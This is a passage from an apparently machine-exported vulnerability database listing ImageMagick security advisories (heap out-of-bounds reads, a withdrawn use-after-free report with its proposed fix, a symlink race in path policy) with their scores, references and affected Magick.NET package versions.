url https://nvd.nist.gov/vuln/detail/CVE-2026-25989
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442136
reference_id 2442136
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442136
10
reference_url https://github.com/advisories/GHSA-7355-pwx2-pm84
reference_id GHSA-7355-pwx2-pm84
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7355-pwx2-pm84
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25989, GHSA-7355-pwx2-pm84
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sd54-b8z1-2fg7
47
url VCID-sd7w-6qv5-73ge
vulnerability_id VCID-sd7w-6qv5-73ge
summary 
ImageMagick: Integer Overflow in PSB (PSD v2) RLE decoding path causes heap Out of Bounds reads for 32-bit builds
An integer overflow in the PSB (PSD v2) RLE decoding path causes a heap out-of-bounds read on 32-bit builds. This can lead to information disclosure or a crash when processing crafted PSB files.

```
=================================================================
==3298==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf512eb00 at pc 0xf76760b5 bp 0xffc1dfb8 sp 0xffc1dfa8
READ of size 8 at 0xf512eb00 thread T0
    #0 0xf76760b4 in ReadPSDChannelRLE coders/psd.c:1141
```
references
0
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
1
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
2
reference_url https://github.com/ImageMagick/ImageMagick/commit/5b91ab69af614024255fd93dcc9a62b41fbc435c
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/5b91ab69af614024255fd93dcc9a62b41fbc435c
3
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-273h-m46v-96q4
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-273h-m46v-96q4
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25984
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25984
5
reference_url https://github.com/advisories/GHSA-273h-m46v-96q4
reference_id GHSA-273h-m46v-96q4
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-273h-m46v-96q4
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25984, GHSA-273h-m46v-96q4
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sd7w-6qv5-73ge
48
url VCID-sdc2-fcap-abaz
vulnerability_id VCID-sdc2-fcap-abaz
summary 
ImageMagick has Heap Out-of-Bounds Read in DCM Decoder (ReadDCMImage)
A heap out-of-bounds read vulnerability exists in the `coders/dcm.c` module. When processing DICOM files with a specific configuration, the decoder loop incorrectly reads bytes per iteration. This causes the function to read past the end of the allocated buffer, potentially leading to a Denial of Service (crash) or Information Disclosure (leaking heap memory into the image).
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25982.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25982.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25982
reference_id
reference_type
scores
0
value 0.00017
scoring_system epss
scoring_elements 0.04211
published_at 2026-04-21T12:55:00Z
1
value 0.00017
scoring_system epss
scoring_elements 0.04092
published_at 2026-04-18T12:55:00Z
2
value 0.00017
scoring_system epss
scoring_elements 0.04084
published_at 2026-04-16T12:55:00Z
3
value 0.00017
scoring_system epss
scoring_elements 0.04142
published_at 2026-04-12T12:55:00Z
4
value 0.00017
scoring_system epss
scoring_elements 0.04156
published_at 2026-04-11T12:55:00Z
5
value 0.00017
scoring_system epss
scoring_elements 0.04176
published_at 2026-04-09T12:55:00Z
6
value 0.00017
scoring_system epss
scoring_elements 0.04162
published_at 2026-04-08T12:55:00Z
7
value 0.00017
scoring_system epss
scoring_elements 0.0413
published_at 2026-04-07T12:55:00Z
8
value 0.00017
scoring_system epss
scoring_elements 0.04116
published_at 2026-04-13T12:55:00Z
9
value 0.00053
scoring_system epss
scoring_elements 0.16707
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25982
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25982
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25982
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pmq6-8289-hx3v
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:03:44Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pmq6-8289-hx3v
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25982
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25982
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442124
reference_id 2442124
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442124
9
reference_url https://github.com/advisories/GHSA-pmq6-8289-hx3v
reference_id GHSA-pmq6-8289-hx3v
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-pmq6-8289-hx3v
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25982, GHSA-pmq6-8289-hx3v
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sdc2-fcap-abaz
49
url VCID-spch-fffg-4yc5
vulnerability_id VCID-spch-fffg-4yc5
summary 
Withdrawn Advisory: ImageMagick has a use-after-free/double-free risk in Options::fontFamily when clearing family
## Withdrawn Advisory
This advisory has been withdrawn because it does not affect the ImageMagick project's NuGet packages.

### Original Description
We believe that we have discovered a potential security vulnerability in ImageMagick’s Magick++ layer that manifests when `Options::fontFamily` is invoked with an empty string.

**Vulnerability Details**
- Clearing a font family calls `RelinquishMagickMemory` on `_drawInfo->font`, freeing the font string but leaving `_drawInfo->font` pointing to freed memory while `_drawInfo->family` is set to that (now-invalid) pointer. Any later cleanup or reuse of `_drawInfo->font` re-frees or dereferences dangling memory.
- `DestroyDrawInfo` and other setters (`Options::font`, `Image::font`) assume `_drawInfo->font` remains valid, so destruction or subsequent updates trigger crashes or heap corruption.

```cpp
if (family_.length() == 0)
  {
    _drawInfo->family=(char *) RelinquishMagickMemory(_drawInfo->font);
    DestroyString(RemoveImageOption(imageInfo(),"family"));
  }
```

- **CWE-416 (Use After Free):** `_drawInfo->font` is left dangling yet still reachable through the Options object.
- **CWE-415 (Double Free):** DrawInfo teardown frees `_drawInfo->font` again, provoking allocator aborts.

**Affected Versions**
- Introduced by commit `6409f34d637a34a1c643632aa849371ec8b3b5a8` (“Added fontFamily to the Image class of Magick++”, 2015-08-01, blame line 313).
- Present in all releases that include that commit, at least ImageMagick 7.0.1-0 and later (likely late 6.9 builds with Magick++ font family support as well). Older releases without `fontFamily` are unaffected.

**Command Line Triggerability**
This vulnerability cannot be triggered from the command line interface. The bug is specific to the Magick++ C++ API, specifically the `Options::fontFamily()` method. The command-line utilities (such as `convert`, `magick`, etc.) do not expose this particular code path, as they operate through different internal mechanisms that do not directly call `Options::fontFamily()` with an empty string in a way that would trigger the use-after-free condition.

**Proposed Fix**
```diff
diff --git a/Magick++/lib/Options.cpp b/Magick++/lib/Options.cpp
@@ void Magick::Options::fontFamily(const std::string &family_)
-      _drawInfo->family=(char *) RelinquishMagickMemory(_drawInfo->font);
+      _drawInfo->family=(char *) RelinquishMagickMemory(_drawInfo->family);
```
This frees only the actual family string, leaving `_drawInfo->font` untouched. Optionally nulling `_drawInfo->font` when clearing `font()` itself maintains allocator hygiene.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-65955.json
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-65955.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-65955
reference_id
reference_type
scores
0
value 0.00022
scoring_system epss
scoring_elements 0.05753
published_at 2026-04-02T12:55:00Z
1
value 0.00028
scoring_system epss
scoring_elements 0.07781
published_at 2026-04-18T12:55:00Z
2
value 0.00028
scoring_system epss
scoring_elements 0.07797
published_at 2026-04-16T12:55:00Z
3
value 0.00028
scoring_system epss
scoring_elements 0.07883
published_at 2026-04-13T12:55:00Z
4
value 0.00028
scoring_system epss
scoring_elements 0.07896
published_at 2026-04-12T12:55:00Z
5
value 0.00028
scoring_system epss
scoring_elements 0.07925
published_at 2026-04-09T12:55:00Z
6
value 0.00028
scoring_system epss
scoring_elements 0.07901
published_at 2026-04-08T12:55:00Z
7
value 0.00028
scoring_system epss
scoring_elements 0.07844
published_at 2026-04-07T12:55:00Z
8
value 0.00028
scoring_system epss
scoring_elements 0.0789
published_at 2026-04-04T12:55:00Z
9
value 0.00028
scoring_system epss
scoring_elements 0.07912
published_at 2026-04-11T12:55:00Z
10
value 0.00028
scoring_system epss
scoring_elements 0.07936
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-65955
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-65955
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-65955
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/commit/6409f34d637a34a1c643632aa849371ec8b3b5a8
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/6409f34d637a34a1c643632aa849371ec8b3b5a8
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/6f81eb15f822ad86e8255be75efad6f9762c32f8
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/6f81eb15f822ad86e8255be75efad6f9762c32f8
7
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1122827
reference_id 1122827
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1122827
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2418549
reference_id 2418549
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2418549
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-65955
reference_id CVE-2025-65955
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-65955
10
reference_url https://github.com/advisories/GHSA-q3hc-j9x5-mp9m
reference_id GHSA-q3hc-j9x5-mp9m
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-q3hc-j9x5-mp9m
11
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-q3hc-j9x5-mp9m
reference_id GHSA-q3hc-j9x5-mp9m
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-q3hc-j9x5-mp9m
fixed_packages
aliases CVE-2025-65955, GHSA-q3hc-j9x5-mp9m
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-spch-fffg-4yc5
50
url VCID-sw7g-hxxr-n3e1
vulnerability_id VCID-sw7g-hxxr-n3e1
summary 
ImageMagick has a Path Policy TOCTOU symlink race bypass
`domain="path"` authorization is checked before final file open/use. A symlink swap between check-time and use-time bypasses policy-denied read/write.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28689.json
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28689.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28689
reference_id
reference_type
scores
0
value 8e-05
scoring_system epss
scoring_elements 0.00721
published_at 2026-04-02T12:55:00Z
1
value 8e-05
scoring_system epss
scoring_elements 0.00712
published_at 2026-04-09T12:55:00Z
2
value 8e-05
scoring_system epss
scoring_elements 0.00722
published_at 2026-04-08T12:55:00Z
3
value 8e-05
scoring_system epss
scoring_elements 0.00723
published_at 2026-04-07T12:55:00Z
4
value 8e-05
scoring_system epss
scoring_elements 0.00718
published_at 2026-04-04T12:55:00Z
5
value 9e-05
scoring_system epss
scoring_elements 0.00945
published_at 2026-04-21T12:55:00Z
6
value 9e-05
scoring_system epss
scoring_elements 0.00889
published_at 2026-04-16T12:55:00Z
7
value 9e-05
scoring_system epss
scoring_elements 0.00892
published_at 2026-04-13T12:55:00Z
8
value 9e-05
scoring_system epss
scoring_elements 0.0089
published_at 2026-04-12T12:55:00Z
9
value 9e-05
scoring_system epss
scoring_elements 0.00896
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28689
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28689
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28689
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-493f-jh8w-qhx3
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-10T15:56:31Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-493f-jh8w-qhx3
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28689
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28689
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445891
reference_id 2445891
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445891
9
reference_url https://github.com/advisories/GHSA-493f-jh8w-qhx3
reference_id GHSA-493f-jh8w-qhx3
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-493f-jh8w-qhx3
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-28689, GHSA-493f-jh8w-qhx3
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sw7g-hxxr-n3e1
51
url VCID-tv15-dcnu-pbbn
vulnerability_id VCID-tv15-dcnu-pbbn
summary 
ImageMagick: Heap overflow in pcd decoder leads to out of bounds read.
The pcd coder lacks proper boundary checking when processing Huffman-coded data. The decoder contains an function that has an incorrect initialization that could cause an out of bounds read.

```
==3900053==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x502000003c6c at pc 0x55601b9cc552 bp 0x7ffd904b1f70 sp 0x7ffd904b1f60
READ of size 1 at 0x502000003c6c thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26284.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-26284.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-26284
reference_id
reference_type
scores
0
value 0.00022
scoring_system epss
scoring_elements 0.06013
published_at 2026-04-21T12:55:00Z
1
value 0.00022
scoring_system epss
scoring_elements 0.05823
published_at 2026-04-02T12:55:00Z
2
value 0.00022
scoring_system epss
scoring_elements 0.05858
published_at 2026-04-04T12:55:00Z
3
value 0.00022
scoring_system epss
scoring_elements 0.05853
published_at 2026-04-07T12:55:00Z
4
value 0.00022
scoring_system epss
scoring_elements 0.05891
published_at 2026-04-08T12:55:00Z
5
value 0.00022
scoring_system epss
scoring_elements 0.05923
published_at 2026-04-09T12:55:00Z
6
value 0.00022
scoring_system epss
scoring_elements 0.05901
published_at 2026-04-11T12:55:00Z
7
value 0.00022
scoring_system epss
scoring_elements 0.05892
published_at 2026-04-12T12:55:00Z
8
value 0.00022
scoring_system epss
scoring_elements 0.05884
published_at 2026-04-13T12:55:00Z
9
value 0.00022
scoring_system epss
scoring_elements 0.05849
published_at 2026-04-16T12:55:00Z
10
value 0.00022
scoring_system epss
scoring_elements 0.0586
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-26284
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26284
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26284
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wrhr-rf8j-r842
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-24T20:46:33Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wrhr-rf8j-r842
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-26284
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-26284
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442137
reference_id 2442137
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442137
9
reference_url https://github.com/advisories/GHSA-wrhr-rf8j-r842
reference_id GHSA-wrhr-rf8j-r842
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wrhr-rf8j-r842
10
reference_url https://usn.ubuntu.com/8069-1/
reference_id USN-8069-1
reference_type
scores
url https://usn.ubuntu.com/8069-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
